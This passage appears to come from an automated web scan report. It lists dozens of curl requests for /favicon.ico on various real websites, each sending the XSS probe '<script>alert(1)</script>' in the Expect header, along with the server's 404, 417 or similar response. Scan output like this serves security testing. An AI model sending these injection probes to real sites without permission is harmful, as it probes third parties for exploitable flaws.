Date: Fri, 01 Apr 2011 16:41:49 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

16.52. http://www.demovirgins.net/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.demovirgins.net
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.demovirgins.net
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Fri, 01 Apr 2011 15:10:40 GMT
Server: lighttpd/1.4.23

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

16.53. http://www.diapers.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.diapers.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.diapers.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
Date: Fri, 01 Apr 2011 17:12:25 GMT
Content-Length: 60
Set-Cookie: NSC_ejbqfst-xxx=ffffffff096c183945525d5f4f58455e445a4a423661;path=/;httponly

The page cannot be displayed because the expectation failed.

16.54. http://www.dinodirect.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dinodirect.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.dinodirect.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
Date: Fri, 01 Apr 2011 16:56:32 GMT
Connection: close
Content-Length: 60

The page cannot be displayed because the expectation failed.

16.55. http://www.dltk-holidays.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dltk-holidays.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.dltk-holidays.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:33:27 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

16.56. http://www.ebaycoupon.us/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebaycoupon.us
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ebaycoupon.us
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 406 Not Acceptable
Date: Fri, 01 Apr 2011 16:32:12 GMT
Server: LiteSpeed
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
Cache-Control: private, no-cache, max-age=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 372

<html>
<head><title> 406 Not Acceptable
</title></head>
<body><h1> 406 Not Acceptable
</h1>
This request is not acceptable<hr />
Powered By <a href='http://www.litespeedtech.com'>LiteSpeed Web Serve
...[SNIP]...

16.57. http://www.foodnetworkstore.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.foodnetworkstore.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.foodnetworkstore.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
P3P: CP="CAO DSP COR CURa ADMi DEVi OUR BUS UNI STA", policyref="/w3c/p3p.xml"
Date: Fri, 01 Apr 2011 17:15:46 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

16.58. http://www.freebie-fusion.net/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebie-fusion.net
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.freebie-fusion.net
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Date: Fri, 01 Apr 2011 17:00:07 GMT
Server: UltraDNS Client Redirection Server
Last-Modified: Fri, 01 Apr 2011 17:00:07 GMT
Accept-Ranges: none
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">
<html>
<head><title>UltraDNS Client Redirection Service</title></head>
<body><table border="2" width="100%">
<tr bgcolor="#FF4444"><th colspan="2"
...[SNIP]...

16.59. http://www.frontdoor.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.frontdoor.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.frontdoor.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Length: 60
Expires: Fri, 01 Apr 2011 15:24:41 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 01 Apr 2011 15:24:41 GMT
Connection: close

The page cannot be displayed because the expectation failed.

16.60. http://www.funnygranny.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.funnygranny.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.funnygranny.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.17
Date: Fri, 01 Apr 2011 15:51:57 GMT
Content-Type: text/html
Content-Length: 169
Connection: keep-alive

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/0.7.17</center>
</body>
</html>

16.61. http://www.galsarchive.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.galsarchive.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.galsarchive.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.46
Date: Fri, 01 Apr 2011 16:51:47 GMT
Content-Type: text/html
Content-Length: 169
Connection: keep-alive

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/0.7.46</center>
</body>
</html>

16.62. http://www.giggidy.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.giggidy.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.giggidy.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.59
Date: Fri, 01 Apr 2011 16:29:07 GMT
Content-Type: text/html
Content-Length: 169
Connection: keep-alive

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/0.7.59</center>
</body>
</html>

16.63. http://www.grammarbook.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.grammarbook.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.grammarbook.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Content-Length: 103
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: PleskWin
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 15:33:42 GMT

<html><head><title>Error</title></head><body>The system cannot find the file specified.
</body></html>

16.64. http://www.gsnrecipes.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.gsnrecipes.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.gsnrecipes.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 400 Bad Request
Content-Type: text/html
Content-Length: 39
Vary: Accept-Encoding
Date: Fri, 01 Apr 2011 16:41:02 GMT
Connection: close

<h1>Bad Request (Invalid Hostname)</h1>

16.65. http://www.halloweenexpress.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.halloweenexpress.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.halloweenexpress.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Date: Fri, 01 Apr 2011 16:01:56 GMT
Server: LiteSpeed
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
Cache-Control: private, no-cache, max-age=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 389

<html>
<head><title> 404 Not Found
</title></head>
<body><h1> 404 Not Found
</h1>
The resource requested could not be found on this server!<hr />
Powered By <a href='http://www.litespeedtech.com'>Li
...[SNIP]...

16.66. http://www.hometeamsonline.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.hometeamsonline.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.hometeamsonline.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:42:15 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

16.67. http://www.hotfile.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.hotfile.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.hotfile.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Connection: close
Date: Fri, 01 Apr 2011 15:41:52 GMT
Server: lighttpd/1.4.26

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

16.68. http://www.hqtoplist.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.hqtoplist.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.hqtoplist.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/0.6.32
Date: Fri, 01 Apr 2011 17:00:42 GMT
Content-Type: text/html
Content-Length: 169
Connection: keep-alive

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/0.6.32</center>
</body>
</html>

16.69. http://www.iforex.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.iforex.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.iforex.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:49:15 GMT
Content-Length: 60
Accept-Ranges: bytes
Cache-Control: private, max-age=7200
Age: 0
Expires: Fri, 01 Apr 2011 18:49:15 GMT
Connection: Keep-Alive

The page cannot be displayed because the expectation failed.

16.70. http://www.iframes.us/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.iframes.us
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.iframes.us
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Date: Fri, 01 Apr 2011 16:49:35 GMT
Content-Type: text/html
Connection: keep-alive
Server: Apache/Nginx/Varnish
Last-Modified: Mon, 17 May 2010 19:11:59 GMT
ETag: "d2e29bc8-4e4-486ceffc79be2"
Vary: Accept-Encoding
Content-Length: 1252
Age: 0

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>

   <head>
    <title>404 Error - Page Not Found</title>
   </head>

   <body>
       <table style="border: 1px dashed rgb(204, 204, 204)
...[SNIP]...

16.71. http://www.installiq.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.installiq.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.installiq.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
P3P: CP="NOI DSP COR LAW NID"
Date: Fri, 01 Apr 2011 16:20:24 GMT
Content-Length: 103

The resource you are looking for has been removed, had its name changed, or is temporarily unavailable.

16.72. http://www.installiqlearnmore.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.installiqlearnmore.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.installiqlearnmore.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Cache-Control: max-age=7200
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
Age: 1328
Date: Fri, 01 Apr 2011 16:12:00 GMT
Expires: Fri, 01 Apr 2011 16:19:53 GMT
Content-Length: 103
Connection: keep-alive

The resource you are looking for has been removed, had its name changed, or is temporarily unavailable.

16.73. http://www.insureme.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.insureme.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.insureme.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 15:23:36 GMT
Content-Length: 103

The resource you are looking for has been removed, had its name changed, or is temporarily unavailable.

16.74. http://www.interweave.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.interweave.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.interweave.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:46:08 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

16.75. http://www.jobappnetwork.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jobappnetwork.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.jobappnetwork.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 15:24:28 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

16.76. http://www.jobvite.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jobvite.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.jobvite.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 15:20:03 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

16.77. http://www.justppc.net/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.justppc.net
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.justppc.net
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Fri, 01 Apr 2011 16:22:41 GMT
Server: lighttpd/1.4.26

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

16.78. http://www.k12jobspot.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.k12jobspot.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.k12jobspot.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
Set-Cookie: .ASPXANONYMOUS=oeaJAhMnzAEkAAAANTgzNzU5YTYtZTc1ZC00OWFjLTkyNDUtYjdhZTE5ZDFkM2Q5ibtx57Do0va7MRrfC_Nv4B-1Fkw1; expires=Fri, 10-Jun-2011 02:06:28 GMT; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 15:26:27 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

16.79. http://www.kevinsmoneytree.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.kevinsmoneytree.org
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.kevinsmoneytree.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Fri, 01 Apr 2011 16:27:16 GMT
Server: Apache 1.3.33

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

16.80. http://www.latinateens-blog.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.latinateens-blog.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.latinateens-blog.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.67
Date: Fri, 01 Apr 2011 16:33:33 GMT
Content-Type: text/html
Content-Length: 169
Connection: keep-alive

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/0.7.67</center>
</body>
</html>

16.81. http://www.leapfish.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.leapfish.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.leapfish.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
ETag: ""
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 15:38:25 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

16.82. http://www.lilumania.in/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.lilumania.in
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.lilumania.in
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.46
Date: Fri, 01 Apr 2011 17:28:47 GMT
Content-Type: text/html
Connection: keep-alive
Content-Length: 483

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD><BODY>
<H1>Not Found</H1>
The requested URL /favicon.ico was not found on this server.
<HR>
<I>www.l
...[SNIP]...

16.83. http://www.mail2web.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mail2web.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mail2web.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

16.84. http://www.maison-de-la-france.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.maison-de-la-france.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.maison-de-la-france.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Content-Length: 103
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 17:09:49 GMT

<html><head><title>Error</title></head><body>The system cannot find the file specified.
</body></html>

16.85. http://www.maps.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.maps.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.maps.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:42:17 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

16.86. http://www.massagegirls18.net/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.massagegirls18.net
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.massagegirls18.net
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.62
Date: Fri, 01 Apr 2011 15:51:28 GMT
Content-Type: text/html
Content-Length: 169
Connection: keep-alive

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/0.7.62</center>
</body>
</html>

16.87. http://www.meaning-of-names.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.meaning-of-names.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.meaning-of-names.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:13:05 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

16.88. http://www.melaleuca.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.melaleuca.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.melaleuca.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:51:36 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

16.89. http://www.metapress.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.metapress.com
Path:	/favicon.ico

Request

Response

16.90. http://www.moneyzue.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.moneyzue.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.moneyzue.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.62
Date: Fri, 01 Apr 2011 16:45:58 GMT
Content-Type: text/html
Content-Length: 169
Connection: keep-alive

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/0.7.62</center>
</body>
</html>

16.91. http://www.mt.gov/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mt.gov
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mt.gov
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 15:39:54 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

16.92. http://www.mydigitalpublication.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mydigitalpublication.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mydigitalpublication.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.63
Date: Fri, 01 Apr 2011 15:20:30 GMT
Content-Type: text/html
Content-Length: 169
Connection: keep-alive
